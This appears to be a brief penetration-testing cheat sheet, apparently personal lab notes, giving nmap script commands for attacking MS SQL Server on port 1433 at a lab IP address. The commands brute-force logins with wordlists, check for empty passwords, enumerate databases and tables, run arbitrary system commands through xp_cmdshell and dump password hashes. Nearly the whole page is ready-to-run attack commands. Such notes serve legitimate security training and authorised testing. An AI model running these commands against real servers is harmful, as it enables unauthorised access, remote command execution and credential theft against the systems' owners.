ms sql syntax

pentestlab link testing mssql with nmap Tally HTB ippsec -- ms sql rev shell + command execution

nmap -p1433 --script ms-sql-info 10.11.1.31

#discovering basic info regarding db

nmap -p1433 --script ms-sql-brute 10.11.1.31

#to bruteforce / checking weak Ms SQL a/c passwords

nmap -p1433 --script ms-sql-brute --script-args userdb=/usr/share/wordlist/rockyou.txt, passdb=/usr/share/wordlists/passlist.txt 10.11.1.31

#using custom wordlist to bruteforce

nmap -p1433 --script ms-sql-empty-password 10.11.1.31

#checking for null passwords

nmap -p1433 --script ms-sql-hasdbaccess.nse --script-args mssql.username=sam 10.11.1.31

# to check what all databases are allowed to sam user

nmap -p1433 --script ms-sql-tables --script-args mssql.username=sam 10.11.1.31

#to list tables in database , will list the columns as well

nmap -p1433 -sV 10.11.1.31

In 2000 version of Ms SQL Server xp_cmdshell was enabled by default so we can do command execution as well

nmap -p1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sam 10.11.1.31

#to check for command execution on xp servers

nmap -p1433 --script ms-sql-xp-cmdshell --script-args=ms-sql-xp-cmdshell.cmd='whoami' , mssql.username=sam 10.11.1.31

#running arbitrary command on server

nmap -p1433 --script ms-sql-dump-hashes --script-args mssql.username=sam 10.11.1.31

#for dumping ms sql hashes

Last updated 3 years ago

Was this helpful?